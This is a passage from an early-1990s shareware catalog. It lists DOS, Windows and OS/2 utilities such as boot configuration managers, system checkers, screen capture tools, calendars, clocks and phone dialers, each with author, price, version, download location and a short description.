DOS programs, send keystrokes to Window + applications, prompt users for input using an assortment of + dialog boxes, make branching decisions, and much more. + + 2.5.5 Configuration utilities + + Product: AutoCon + Needs: IBM PC, DOS 2.0 or better. + Author: Larry Weaver, 916-623 5045 + Registration: $15.00 + Registration benefits: At least one year of voice/BBS support. + Version: 2.0g (03-14-92) + User benefits: At least one year of voice/BBS support. + Look for: AUTOCON.ZIP on BBSs (call 916-623 4455 to download it + at no charge); AUTOCN.ZIP in IBMSYS forum LIB 1 on CompuServe; + AUTOCON.ZIP in IBMPC RTC LIB 0 on GEnie. + Download size: 130k + Description: + Full interactive (internal and/or external editor, pull down + menus, mouse support, and context sensitive help) or command + line AUTOEXEC.BAT and CONFIG.SYS configuration management. Can + use current configuration files. Provisions for disk cacheing + software. MENU.CTL device driver allows configuration + selection during boot process. Handles all of the nitty-gritty + details for you. See Nov. 13, 1990 PC Magazine p. 50 for a + review of previous version. + + Chapter 2, "Utilities" 75 + + + + Product: BOOT.SYS + Needs: IBM PC, DOS 2.11 or better. MS-DOS or IBM PC-DOS, + including version 5.00; may not work with DOS clones. + Author: Hans Salvisberg + Registration: $39.00 + Registration benefits: current disk, printed and bound manual; + email (CompuServe [73237,3556], Internet) and mail support; + registration transferable to future shareware versions. + Version: 1.42 (07-03-91) + User benefits: current disk, printed and bound manual; email + (CompuServe [73237,3556], Internet) and mail support; + registration transferable to future shareware versions. + Look for: BOOT142.EXE on BBSs; BOOT14.EXE in IBMSYS forum LIB 1 + on CompuServe. + Download size: 83k + Description: + Makes it possible to display one or more menus at boot-up time + and to have different parts of CONFIG.SYS and/or AUTOEXEC.BAT + executed, depending on which menu option(s) are chosen. No more + editing/renaming your start-up files and rebooting. Up to 9 + options per menu, up to 25 consecutive and/or nested menus. + Easy installation, detailed examples for every level of + sophistication. Full support for MS/PC-DOS 5.00. + + Product: BootMaster [***] + Needs: IBM PC, DOS 3.0 or better. + Author: RoSi Software, 011-49-30-744-7707 + Registration: $20.00 + Registration benefits: No screen reminder on booting, unlimited + support, site license. + Version: 3.2 (01-01-92) + User benefits: No screen reminder on booting, unlimited support, + site license. + Look for: availability unknown on BBSs; BOOTMA.EXE in IBMSYS + forum LIB 2 on CompuServe. + Download size: 136k + Description: + This configuration manager lets you select different + environments. It's very easy to use and it does NOT manipulate + the boot partition table, a matter I think many users else + would be a bit nervous about. It's possible to activate a boot- + up module, allowing you to pick a choice at boot time. NOW NEW: + Language independency: Choose between USA-GERMAN-BRITISH- + FRENCH-SPANISH. + + Chapter 2, "Utilities" 76 + + + + Product: DasBOOT! + Needs: IBM PC, DOS 2.0 or better. + Author: WHEEL Games + Registration: $5.00 + Registration benefits: 90 days support. + Version: 1.30 (02-07-92) + User benefits: 90 days support. + Look for: availability unknown on BBSs; DASBOT.ZIP in FSFORUM + forum LIB 13 on CompuServe. + Download size: 45k + Description: + This menu program lets the user select between several sets of + CONFIG.SYS and AUTOEXEC.BAT files. A very handy utility + program to help you get the maximum amount of memory for using + flight simulators or other memory hungry programs and then + allows an easy way to restore your normal day-to-day + configuration. + + Product: HiMOVE + Upper Memory Manager. See full description on page 40. + + Product: Painless Event Processor + Event Scheduler to allow your PC to work 24hr. See full + description on page 70. + + Product: PC-INFO + Needs: IBM PC, DOS 2.0 or better. + Author: Cheat River Engineering, 201-627-5460 + Registration: $15.00 + Registration benefits: Most current version mailed; voice & CIS + support; free updates. + Version: 2.17 (05-27-91) + User benefits: Most current version mailed; voice & CIS support; + free updates. + Look for: PC-217.ZIP on BBSs (call 207-766-2467 to download it at + no charge); PCINFO.EXE in IBMHW forum LIB 4 on CompuServe. + Download size: 32k + Description: + Displays operating system & hardware configurations; including + Intel & Weitek coprocessors.Especially useful when supporting + multiple systems. Reports copyright text found in ROM BIOS + code, handy in determining BIOS source and clone + manufacturers.All video adaptor types are recognized & handled + automatically.Supports DOS 4/5 disk partitions>32Mb, inc. + networked drives. Self-extracting archive. Eng. design serv./ + mech.prototype constr./contract CAD/custom SW dev. our + specialty. + + Product: SHERLOCK [***] + A dual window ASCII file comparison utility. See full + description on page 37. + + Chapter 2, "Utilities" 77 + + + + Product: Snooper, the system checker [***] + Needs: IBM PC, DOS 2.0 or better. + Author: John Vias, 904-332-8234 + Registration: $25.00 + Registration benefits: Printed manual, master disks, phone/ + Compuserve/BBS/mail support. + Version: 1.50 (03-30-92) + User benefits: Printed manual, master disks, phone/Compuserve/ + BBS/mail support. + Look for: SNOOP150.ZIP on BBSs (call 904-332-2848 to download it + at no charge); SNOOPR.ZIP in IBMHW forum LIB 4 on CompuServe. + Download size: 75k + Description: + This fast, friendly, and flexible system information utility is + perfect for collecting hardware inventory, for customer support + of hardware & software products, and individual use. Shows + your computer type, CPU model & speed, NDP, bus, BIOS brand & + date, conventional/extended/expanded memory, HMA, largest UMB, + network, floppy & hard disks, video type, keyboard, mouse, VGA + memory & chipset, environment size, sound cards, CD-ROM, port + addresses, ANSI, NDOS, and much more. + + 2.5.6 Recovery utilities + + Product: Btr Help! + Btrieve File Utility. Repair, Edit, Browse. See full + description on page 299. + + Product: HDTEST + Thorough Read/Write hard/floppy disk test. See full + description on page 16. + + Product: Integrity Master(tm) + Easy to use anti-virus/data integrity prog. See full + description on page 117. + + Product: An Ounce Of Prevention + Disaster-prevention/data-protection system. See full + description on page 115. + + Product: Professional Master Key + Unerase, hex editor, unformat, disk map, etc. See full + description on page 19. + + 2.5.7 Screen capture + + See also: Utilities, Printer utilities (page 44). + + Chapter 2, "Utilities" 78 + + + + Product: Capbuf + Needs: IBM PC, DOS 2.1 or better. + Author: Cascoly Software, 206-523-6135 + Registration: $30.00 + Registration benefits: Phone/CompuServe support. + Version: 1.41 (12-28-90) + User benefits: Phone/CompuServe support. + Look for: availability unknown on BBSs; CAPBUF.ZIP in IBMSYS + forum LIB 3 on CompuServe. + Download size: 40k + Description: + A memory resident (TSR) program that lets you capture any text + screen and save it for later processing or printing. It's quite + useful for programs that do not otherwise provide means of + printing their results: such as intermediate results of games, + or collecting copies of messages while on a bulletin board. + Also includes a filter to remove line drawing characters. + + Product: The Laughing Dog Screen Maker [***] + Text-mode Screen Designer w/Code Generation. See full + description on page 285. + + Product: Textshot + Needs: IBM PC, DOS 2.1 or better. + Author: McAdams Associates + Registration: $25.00 + Registration benefits: Master disks, one year phone/CompuServe/ + mail support, bonus utilities. + Version: 2.1 (01-23-92) + User benefits: Master disks, one year phone/CompuServe/mail + support, bonus utilities. + Look for: TSHOT21.ZIP on BBSs; TSHOT2.ZIP in IBMSYS forum LIB 3 + on CompuServe. + Download size: 27k + Description: + This TSR pop-up program saves images of any 80-column text + screen to monochrome .PCX-format files. Ideal for developers! + Works with all common video standards. Features image + clipping, switchable fonts, image inversion and color patterns. + Easily removed from memory, and all disk operations are error- + protected. + + 2.5.8 Other + + Product: ClipMate for Windows [***] + Captures Multiple Clipboard Text Items. See full description + on page 91. + + Product: Dupes + Finds duplicate/empty files & empty dirs. See full description + on page 26. + + Chapter 2, "Utilities" 79 + + + + Product: Except + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Registration benefits: Eligibility for free upgrades. + Version: 2.00 (06-15-91) + User benefits: Eligibility for free upgrades. + Look for: EXCED200.ZIP on BBSs; EXCED2.ZIP in IBMSYS forum LIB 3 + on CompuServe. + Download size: 18k + Description: + Temporarily protects files by making them inaccessible to most + DOS commands, programs, and batch files. Use it to protect + sensitive files, or to affect some, but not all, files in a + directory. For example, to see all files in the current + directory except those ending in DOC, you'd enter EXCEPT *.DOC + DIR. To hide a certain file from a word processor, you could + enter EXCEPT SECRET.DOC WP. + + Product: Globally + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Registration benefits: Eligibility for free upgrades. + Version: 1.22 (06-09-91) + User benefits: Eligibility for free upgrades. + Look for: GLOBD122.ZIP on BBSs; GLOBL1.ZIP in IBMSYS forum LIB 3 + on CompuServe. + Download size: 18k + Description: + Executes a command or program in multiple directories. It can + execute in all directories on a disk, or in just the current & + subordinate directories. For example, to delete all files on + your disk with an extension of BAK, you would enter GLOBALLY + DEL *.BAK. + + Product: Globally/2 + Needs: IBM AT (80286), OS/2 1.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Registration benefits: Eligibility for free upgrades. + Version: 1.11 (07-06-91) + User benefits: Eligibility for free upgrades. + Look for: GLOBO111.ZIP on BBSs; GLOB01.ZIP in IBMSYS forum LIB 2 + on CompuServe. + Download size: 18k + Description: + Executes a command or program in multiple directories. It can + execute in all directories on a disk, or in just the current & + subordinate directories. For example, to delete all files on a + hard disk with an extension of BAK, you would enter GLOBALLY + DEL *.BAK. + + Chapter 2, "Utilities" 80 + + + + Product: Renamer + Renames directories. See full description on page 20. + + Product: Renamer/2 + Renames directories. See full description on page 21. + + Product: SAFEPACK [***] + Disk defragmenter with data safety features. See full + description on page 9. + + + 2.6 Desktop utilities + + Product: Browse/2 + OS/2 file viewer for ASCII and hex data. See full description + on page 40. + + Product: Instant Access Menu System [***] + Easy, colorful interface for running programs. See full + description on page 103. + + Product: PhoneBook [***] + Needs: IBM PC, DOS 2.0 or better. + Author: Robert M. Bernard + Registration: $15.00 + Registration benefits: Master disks, support. + Version: 1.0 (04-01-92) + User benefits: Master disks, support. + Look for: availability unknown on BBSs; PB100.ZIP in IBMSYS forum + LIB 7 on CompuServe. + Download size: 43k + Description: + PhoneBook is a user friendly menu driven program used to store, + sort, browse, print, or merge lists of names, addresses and + phone numbers. Sort based on any of several fields. Make + different lists for family, business, holidays, etc. Each file + generated can be easily edited or merged with other files, and + saved under a different name. Print your lists in different + formats, including mailing labels. Simple to generate several + pages of return address labels. Dot matrix and laser printer + support. + + 2.6.1 Multi-function + + Product: dLITE + Memory-res dBASE-Compat Desktop File Manager. See full + description on page 155. + + Product: Programmer's Productivity Pack + Productivity Tools for Programmers. See full description on + page 286. + + Chapter 2, "Utilities" 81 + + + + Product: WinPost + Needs: IBM PC, Windows 3.0 or better. + Author: Eastern Mountain Software, 614-798-0910 + Registration: $30.00 + Registration benefits: Printed manual, technical support, latest + version on disk. + Version: 3.1a (09-18-91) + User benefits: Printed manual, technical support, latest version + on disk. + Look for: availability unknown on BBSs; WPST31.ZIP in WINADV + forum LIB 11 on CompuServe. + Download size: 73k + Description: + Get rid of your Post-it(tm) notes! This Windows utility allows + the user to create and manage reminder notes. Icon Tool Bar, + mouse shortcuts and accelerator keys make this a very intuitive + and easy-to-use utility. Major features include print + facility, search facility, alarm notes, numerous configuration + parameters, auto save, and more. Selected as one of "Powerhouse + Utilities for Under $50" by PC World magazine (7/91). A must + for Windows users! + + Product: Zephyr + FoxPro-Compatible DBMS for Non-Programmers. See full + description on page 154. + + 2.6.2 Calculators + + Product: AFFORD IT??? + Monetary calculator (annuities,savings,loans). See full + description on page 255. + + Product: CALC_JNC + Needs: IBM PC, DOS 3.0 or better. + Author: James N. Cox + Registration: $25.00 + Registration benefits: Printed manual, master disk, phone/ + CompuServe/mail support, 30-day money back. 80x87 Support. + Bonus utilities. + Version: 8.24 (02-24-92) + User benefits: Printed manual, master disk, phone/CompuServe/mail + support, 30-day money back. 80x87 Support. Bonus utilities. + Look for: CALJNC.ZIP on BBSs (call 215-721-0363 to download it at + no charge); CALJNC.ZIP in IBMPRO forum LIB 6 on CompuServe. + Download size: 32k + Description: + Programmers mode: Does automatic conversions between + DEC,HEX,OCT and BINARY. Other functions are + MOD,AND,NAND,OR,NOR,XOR,NOT,NEGATION, and 10 RESULT MEMORIES + + Floating point mode: Always displays last formula entered. + Functions include SQR + ROOT,ROOT,CUBE,SIN,COS,TAN,HYPERBOLICS,LOG'S,PI, + + Chapter 2, "Utilities" 82 + + + + FRACTION,FACTOR,INT,ABS,SEXAGESIMAL,10 RESULT/PREVIOUS + MEMORIES, and FIXED POINT and more. + + Features in both modes: TSR Option, Colors, 80-132 Columns, + send result to keyboard buffer. + + Product: MORSOFT CALCULATOR + Needs: IBM PC, DOS 2.1 or better. 256k RAM. + Author: MORSOFT, 512-561-0731 + Registration: $14.95 + Registration benefits: Printed manual, phone support. + Version: 2.0 (07-01-89) + User benefits: Printed manual, phone support. + Look for: availability unknown on BBSs; MORCAL.ZIP in IBMSYS + forum LIB 7 on CompuServe; MORCALC.ZIP in IBMPC RTC LIB 5 on + GEnie. + Download size: 74k + Description: + Calculate in style. A business calculator/adding machine with + the functions of add, subtract, multiply, percent, divide and + trigonometric functions. Also a memory constant feature and sub + and overall totals. All operations may be performed in decimal + or HEX. The main advantage however is the 1,000 entry "paper + tape" that is displayed on the screen and may be scrolled + forward or back, changed, and printed. + + 2.6.3 Calendars + + Product: ActCalendar + Needs: IBM PC, DOS 3.0 or better. + Author: ShareGames, 619-283-0472 + Registration: $15.00 + Registration benefits: Latest Version, Free updates for 6 Months, + & 24 Hr Tech Support. + Version: 2.5 (01-22-91) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: ACTCLDR.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 98k + Description: + Can be used in conjunction with ActMenu, or as a stand-alone + program, to display over 1,000 of your scheduled events over a + four year span. Initially it displays six months with the + current month at top center. All Holidays and your scheduled + event days are highlighted. Dates may be selected with cursor + keys or mouse to display and/or edit the events. A week panel, + which displays up to 5 events, and a day panel for 10 events + are available. + + Chapter 2, "Utilities" 83 + + + + Product: Ample Notice + Needs: IBM PC, DOS 2.0 or better. + Author: Granny's Old-Fashioned Software, 704-264-6906 + Registration: $30.00 + Registration benefits: Current disk and manual, future update, + technical support. + Version: 2.04 (05-21-91) + User benefits: Current disk and manual, future update, technical + support. + Look for: availability unknown on BBSs; AN204.ZIP in IBMSYS forum + LIB 7 on CompuServe; AN204.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 141k + Description: + An appointments calendar/alarm clock package that can help + organize your life. Appointments and notes are entered 'free- + form'. You can easily record: + * birthdays (with ages updated each year) + * a meeting every other Tuesday at 4:00 for 5 meetings + * Father's Day (third Sunday in June) + * many other date patterns. + Appointments automatically set a 'pop-up alarm clock'. + Printouts can be obtained in many print styles for reference + away from your computer. + + Product: APCAL [***] + Appointment Calendar / Time Management. See full description + on page 96. + + Product: Calendar Keeper + Needs: IBM PC, DOS 3.0 or better. Hard disk recommended. + Author: Dataphile Software, 616-327-7811 + Registration: $33.00 + Registration benefits: Printed manual, master disks, phone + support. + Version: 3.0a (02-02-91) + User benefits: Printed manual, master disks, phone support. + Look for: availability unknown on BBSs; CAL30.EXE in IBMAPP forum + LIB 7 on CompuServe. + Download size: 350k + Description: + A calendar database program which maintains up to 10 separate + calendar database files. It supports 5 event types: Permanent; + Current-Year-Only; Consecutive days (or business days); Every + 'n' days (or business days); and Monthly on Day-of-Week. + Calendar Keeper has 3 report formats: Monthly- Wall-Calendar; + Week-at-a-Glance; Year-at-a-Glance. Utility included to create + print driver for any printer (7 common print drivers included). + + Chapter 2, "Utilities" 84 + + + + Product: Calendar Mate + Needs: IBM PC, DOS 3.0 or better. 384k RAM. + Author: Hawk Software, 306-543-8899 + Registration: $25.00 + Registration benefits: Unlimited support; current release + automatically shipped. + Version: 4.1 (06-01-91) + User benefits: Unlimited support; current release automatically + shipped. + Look for: CALMATE4.ZIP on BBSs (call 306-777-4493 to download it + at no charge); CALMT4.ZIP in IBMSYS forum LIB 7 on CompuServe. + Download size: 165k + Description: + A full featured calendar program that is extremely user + friendly and flexible. Its major distinctives are its ability + to print daily, monthly and yearly calendars and its + flexibility in defining repeating events. Many different + intervals may be specified such as 'annually' or 'last workday + of the month'. Different events files may be easily maintained + and calendars may be printed in English, Spanish, French or + German. A fine, inexpensive calendar program. + + Product: DARN! Don't Forget! + Non TSR Annual Events Reminder. See full description on + page 92. + + Product: DayMaster + Needs: IBM PC, DOS 2.1 or better. Hard disk or high denisty + disk. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Registration benefits: Master disks, phone/BBS/mail support. A + personal event added to the permanent data file. Shareware + disks of other programs. + Version: 3.70a (11-10-91) + User benefits: Master disks, phone/BBS/mail support. A personal + event added to the permanent data file. Shareware disks of + other programs. + Look for: DAYM370A.ZIP on BBSs (call 317-784-2147 to download it + at no charge); DAYMST.ZIP in IBMSYS forum LIB 7 on CompuServe. + Download size: 170k + Description: + Provides User with trivia,birthdays, anniversaries for a + particular date, AND allows User to include their own + information for any date. It also gives a quote for the day, + and informs User of any Reminders the User might have entered. + Reminder feature works for Weekly/Monthly/Daily/ Annual/Single + or Range of dates basis. All of this can take place at boot up + or any other time User activate the program. The permanent data + file contains over 2500 historical events and 500 quotes. + + Chapter 2, "Utilities" 85 + + + + Product: Early Bird + Needs: IBM PC, DOS 2.1 or better. + Author: Allan Computer Products, 913-384-5725 + Registration: $30.00 + Registration benefits: Bound manual, Current version diskette, + Phone/FAX/newsletter support. + Version: 1.0f (08-17-91) + User benefits: Bound manual, Current version diskette, Phone/FAX/ + newsletter support. + Look for: EB10*.ZIP on BBSs (call 303-933-0701 to download it at + no charge); EB10F.ZIP in IMBSYS forum LIB 7 on CompuServe; + EB10F.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 190k + Description: + The best user-friendly, full-featured reminder program + rd + available. It features simple or complex reminders (e.g., 3 + th + from last Thurs of every 9 month), desktop calendar & scan + (AUTOEXEC) modes, color pull-down & pop-up menus, context + sensitive on-line help, alarm, DOS shell, mouse support, file + commands, & selectable group printing. Also has user definable + classes, notice, print/display options and many special + effects. + + Product: Easy Access + Professional Menu System w Calendar. See full description on + page 101. + + Product: InContext + DOS shell+, based on principles of human work. See full + description on page 114. + + Product: Mayan Calendar + Converts Mayan/modern calendar dates. See full description on + page 379. + + Product: Names & Dates + Address Book, Calendar, Mailing Label combo. See full + description on page 93. + + Product: On This Day [***] + "What Happened On This Day in History?" See full description + on page 326. + + Chapter 2, "Utilities" 86 + + + + Product: ORGANIZE + Needs: IBM PC, DOS 2.1 or better. IBM Graphics, Epson, or HP + Laserjet printer. + Author: David H. Pritchett + Registration: $25.00 + Registration benefits: Printed manual. + Version: 2.12 (05-16-91) + User benefits: Printed manual. + Look for: ORG212.ZIP on BBSs (call 912-471-7629 to download it at + no charge); ORG212.ZIP in IBMSYS forum LIB 7 on CompuServe. + Download size: 64k + Description: + An efficient, easy to use personal appointment calendar + designed for those who must keep up with appointments and other + future events. Memos, appointments, and events are entered + through a full screen editor and may be previewed in a WYSIWYG + view prior to printing. Features on-line context sensitive + help, pop-up windows, and a tickler to remind you of important + events. A calendar is printed in full page format with events + listed in each day's block. + + Product: Personal Calendar (PC) for DOS + TSR PIM Appointment Reminder, Clock, Calendar. See full + description on page 94. + + Product: Task Master [***] + Project tracking and management program. See full description + on page 220. + + Product: Tikler + Quick, easy, appointment/event reminder. See full description + on page 95. + + Product: What's Up(tm) + Needs: IBM PC, DOS 2.0 or better. + Author: Nassib Nassar + Registration: $20.00 + Registration benefits: Disk with latest version, one year support + by mail, future updates at nominal charge. Overseas postage: + add $4.00. Registration only: $15. + Version: 1.31 (06-02-91) + User benefits: Disk with latest version, one year support by + mail, future updates at nominal charge. Overseas postage: add + $4.00. Registration only: $15. + Look for: availability unknown on BBSs; WATSUP.ZIP in IBMSYS + forum LIB 7 on CompuServe; WHATSUP.ZIP in IBMPC RTC LIB 5 on + GEnie. + Download size: 50k + Description: + An easy-to-use reminder and calendar program that features + flexible date specification (recurring dates and days-of-the- + week, and wild-card dates), advance display of messages, + selection of US or European date formats, calendar in 5 + languages, and multiple message files. Program allows display + + Chapter 2, "Utilities" 87 + + + + of messages for any date input by user, search of message file + for a string, and display of "missed" messages (if program was + not run on the day message was due). + + 2.6.4 Clocks + + Product: CLOCK [***] + Needs: IBM PC, DOS 2.0 or better. + Author: Gamma Software, 303-667-9960 + Registration: $10.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 2.00 (01-10-92) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: CLOCK200.ZIP on BBSs; CLOCK2.ZIP in IBMNET forum LIB 7 + on CompuServe; CLOCK200.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 25k + Description: + This memory resident (TSR) program continuously displays the + day of the week, date and time on the screen. The clock can be + turned on and off with a user specified hot-key. The color and + position of the clock can also be configured. The program takes + up approximately 2k of memory when loaded. + + Product: PCCLOCK + Needs: IBM PC, DOS 2.1 or better. CGA monitor; 1200 baud modem. + Author: Michael J. Sadaway + Registration: $10.00 + Registration benefits: One-time registration, printed manual, + master disks, CompuServe/GEnie/mail support. + Version: 2.14 (04-30-91) + User benefits: One-time registration, printed manual, master + disks, CompuServe/GEnie/mail support. + Look for: PCCLK214.ZIP on BBSs; PCK214.ZIP in IBMSYS forum LIB 1 + on CompuServe; PCCLK214.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 77k + Special instructions: Product distribution restricted to the + United States. + Description: + Sets your PC's date and time quickly, conveniently, and + accurately by modem by calling the atomic clock at the National + Institute of Standards and Technology (formerly the National + Bureau of Standards) in Boulder, Colorado. Also an attractive + digital clock, PCCLOCK displays the date and time in big digits + in any of 80 colorful built-in designs plus up to 20 you create + yourself. Features manual as well as automatic setting, 6-digit + 12- or 24-hour display, Big Ben chime, and alarm. + + Product: Personal Calendar (PC) for DOS + TSR PIM Appointment Reminder, Clock, Calendar. See full + description on page 94. + + Chapter 2, "Utilities" 88 + + + + 2.6.5 Phone dialers + + See also: Communications, Call logging & analysis software + (page 182). + + Product: DialThat + Needs: IBM PC, DOS 2.0 or better. Modem on either serial port + COM1 or COM2. + Author: Real Software, 408-476-3550 + Registration: $10.00 + Registration benefits: Latest disk, support. + Version: 1.03 (02-01-91) + User benefits: Latest disk, support. + Look for: DIALT1.ZIP on BBSs (call 408-476-3550 to download it at + no charge); DIALT1.ZIP in IBMCOM forum LIB 2 on CompuServe; + DIALT103.ZIP in IBMPC RTC LIB 6 on GEnie. + Download size: 5k + Description: + A resident program to select a phone number on the screen, and + to dial it on the modem. Uses about 2k RAM. Requires the + screen to be in text mode. + + Product: Easydial + Needs: IBM PC, DOS 2.0 or better. Modem. + Author: Patri-Soft, 714-352-2820 + Registration: $20.00 + Registration benefits: Latest version, BBS access and future + updates. Money Back Gurantee. + Version: 3.6 (07-10-91) + User benefits: Latest version, BBS access and future updates. + Money Back Gurantee. + Look for: ED36.ZIP on BBSs (call 714-352-2825 to download it at + no charge); ED36.ZIP in IBMCOM forum LIB 6 on CompuServe; + ED36.ZIP in IBMPC-615 RTC LIB 5 on GEnie. + Download size: 65k + Description: + A very easy phone dialer. Just type its name. You can enter + any number of names and phone numbers to its database. To call + a Jackie Smith, just type ED JACKIE if JACKIE SMITH is the only + JACKIE in the file. Supports special phone systems where you + must dial a special number first, a phone log, credit card + calling and more. + + Product: fastmenu GOLD + Graphics User Interface (GUI), Menu System. See full + description on page 112. + + Product: HDM IV - Hard Disk Menu + DOS Menu & Security System, Network Support. See full + description on page 102. + + Chapter 2, "Utilities" 89 + + + + Product: Little Black Book + Needs: IBM PC, DOS 2.0 or better. EGA monitor, hard disk. Modem + optional. + Author: GTX Software, 213-257-2704 + Registration: $20.00 + Registration benefits: Free upgrades for one year. + Version: 1.41 (12-12-91) + User benefits: Free upgrades for one year. + Look for: LBB.ZIP on BBSs (call 414-789-4352 to download it at no + charge); LBB.ZIP in ZNT:TIPS forum LIB 0 on CompuServe. + Download size: 64k + Description: + LBB is a full featured address book manager. You can maintain + personal and business records, limited only by available disk + space. LBB will function as a telephone dialer also. QuickDial + feature allows for dialing a number on startup. LBB will print + a pocket sized directory that can easily be carried with you. + Context sensitive help available at the touch of a key. + + Product: NAMEBASE + Name/Address/Notes database w/mouse support. See full + description on page 222. + + Product: Names & Dates + Address Book, Calendar, Mailing Label combo. See full + description on page 93. + + Product: Painless Menu Manager + Menuing system for Hard Disks. See full description on + page 104. + + Product: PC-Names + Combination Mail List manager, address book. See full + description on page 160. + + Product: PCFDial + Needs: IBM PC, DOS 2.0 or better. Hard disk; Hayes modem. + Author: Barn Owl Software, 618-632-7345 + Registration: $19.00 + Registration benefits: Printed manual; 31/2' & 51/4' master disks; + 30-day return policy, no questions asked; one year of voice/ + fax/newsletter support. + Version: 1.04 (01-22-92) + User benefits: Printed manual; 31/2' & 51/4' master disks; 30-day + return policy, no questions asked; one year of voice/fax/ + newsletter support. + Look for: PCFD-104.ZIP on BBSs; PCFDIL.ZIP in IBMSYS forum LIB 7 + on CompuServe; PCFD-103.ZIP in IBMPC RTC LIB 0 on GEnie. + Download size: 150k + Description: + Winner of Public Brand's 1991 awards for useful software! + + Chapter 2, "Utilities" 90 + + + + This 7k swapping TSR dials voice phone numbers displayed by + other programs (such as database software). Can dial "vanity" + numbers like 800-IBM-DISK or numbers split apart on separate + lines. Keeps a log of calls and displays the local time for + each area code. Pops up at regular intervals to let you know + how long you've talked (useful for salesmen who must "close the + deal" in a set amount of time). Context sensitive help. + + Product: Public Address + High-performance compact Address database. See full + description on page 161. + + Product: STAFF-DIAL + Needs: IBM PC, DOS 3.0 or better. 640k RAM, Hayes modem, hard + disk. Extended/expanded memory recommended. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $39.00 + Registration benefits: Printed manual, latest version of program, + phone support. + Version: 2.0 (01-01-91) + User benefits: Printed manual, latest version of program, phone + support. + Look for: availability unknown on BBSs; STFDIA.ZIP in IBMAPP + forum LIB 3 on CompuServe. + Download size: 260k + Special instructions: Product distribution restricted to the + United States. + Description: + Allows dialing any telephone number stored in a DBF file. The + program is developed for the German telephone system, however + it can be used anywhere if a Hayes compatible modem is + installed. Features: unlimited size of telephone directory + (limited by hard disk storage), fast find of indexed + information (any field can be indexed), file name and column + for dialing can be set up as default, time & cost control, + every call can be registered to a log file, can operate as TSR, + call scheduling... + + Product: WAMPUM + Menu-Driven dBASE-Compat. DBMS in a 20K TSR. See full + description on page 153. + + 2.6.5.1 Rolodex programs + + Product: ActMenu + Custom menus w/reminders, phone dir & dialer. See full + description on page 99. + + Chapter 2, "Utilities" 91 + + + + Product: dbDIAL(tm) + Needs: IBM PC, DOS 2.0 or better. Hard disk, 640k RAM. Hayes + modem recommended. + Author: ZPAY Payroll Systems, Inc., 813-866-8233 + Registration: $49.00 + Registration benefits: Printed manual, master disks, one year + mail support, 900# phone support. + Version: 1.02 (01-06-92) + User benefits: Printed manual, master disks, one year mail + support, 900# phone support. + Look for: DBD-?.ZIP (multiple files) on BBSs; DBD-?.ZIP in IBMAPP + forum LIB 6 (multiple files) on CompuServe; DBD-?.ZIP in IBM + RTC LIB 0 (multiple files) on GEnie. + Download size: 490k + Description: + This 7k TSR database dials the phone, logs your calls, reminds + you when to make a call, pastes an address into your word + processor plus much more! Has hooks into the GRAB Plus(r) + program for printing envelopes and has a built in mail merge + system. + + 2.6.6 Alarms + + Product: Ample Notice + Very flexible appointment scheduler/alarm. See full + description on page 83. + + Product: APCAL [***] + Appointment Calendar / Time Management. See full description + on page 96. + + Product: Personal Calendar (PC) for DOS + TSR PIM Appointment Reminder, Clock, Calendar. See full + description on page 94. + + 2.6.7 Notepads + + Product: ClipMate for Windows [***] + Needs: IBM PC, Windows 3.0 or better. + Author: Chris Thornton + Registration: $20.00 + Registration benefits: Master disks, 90-day support. + Version: 1.14 (03-07-92) + User benefits: Master disks, 90-day support. + Look for: availability unknown on BBSs; CLIPMT.ZIP in IBMSYS + forum LIB 4 on CompuServe. + Download size: 93k + Description: + Captures all text items that appear on the Windows Clipboard + and keeps them for later retrieval. There are many functions + to help you retrieve and manipulate clipboard data, such as + Concatenate, Re-Flow Paragraph, Word Find, and Magnify. You can + edit the clipboard data, and you have configurable options for + + Chapter 2, "Utilities" 92 + + + + short-term and long-term storage. The ultimate Windows power + tool, with easy-to-use Icon Ribbon, and Windows Help. + + Product: Painless Menu Manager + Menuing system for Hard Disks. See full description on + page 104. + + Product: Technical Editor + DOS/OS2 Programmers/Text editor (VIRTUAL). See full + description on page 131. + + 2.6.8 Personal information managers (PIMs) + + Product: CALendar preview for SideKick 2 + CALSK2-Sidekick 2.0 Calendar Preview Utility. See full + description on page 119. + + Product: CALendar RePorT for SideKick+ + Formatted Calendar Reporting Program for SK+. See full + description on page 120. + + Product: CALendar report for TRaVel + Traveling Sidekick Reports from Sidekick Plus. See full + description on page 120. + + Product: DARN! Don't Forget! + Needs: IBM PC, DOS 2.1 or better. + Author: EmmaSoft, 607-533-4685 + Registration: $10.00 + Registration benefits: Printed manual, master disks, support. + Version: 3.00 (07-12-90) + User benefits: Printed manual, master disks, support. + Look for: DARN3.ZIP on BBSs (call 607-533-7072 to download it at + no charge); DARN3.ZIP in IBMSYS forum LIB 7 on CompuServe; + DARN3.ZIP in IBMPC RTC LIB 0 on GEnie. + Download size: 96k + Description: + This small program has one purpose: to remind you of events + that occur on the same day each year. Great for remembering + birthdays, anniversaries, tax payments, mortgage payments, car + inspections, and more. Simple to use - you can set it to only + appear once a day, or each time you boot your computer. You + choose how many days ahead you want to be warned of events. Up + to 300 events per file, search, easy to maintain lists, prints + and exports events lists. + + Product: dbDIAL(tm) + 7k TSR Database/Dialer. See full description on page 90. + + Product: FlexBase + Create database, reports, letters, labels. See full + description on page 222. + + Chapter 2, "Utilities" 93 + + + + Product: Home Helper + Needs: IBM PC, DOS 3.0 or better. Hard disk recommended. + Author: Torbert Data Systems, INC., 804-488-5506 + Registration: $15.00 + Registration benefits: Support BBS, updated copy of software, + copy of another program sent. + Version: 1.3 (11-09-91) + User benefits: Support BBS, updated copy of software, copy of + another program sent. + Look for: 804-488-4146 on BBSs (call 804-488-5506 to download it + at no charge); HH13.ZIP in IBMAPP forum LIB 7 on CompuServe; + HH13.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 300k + 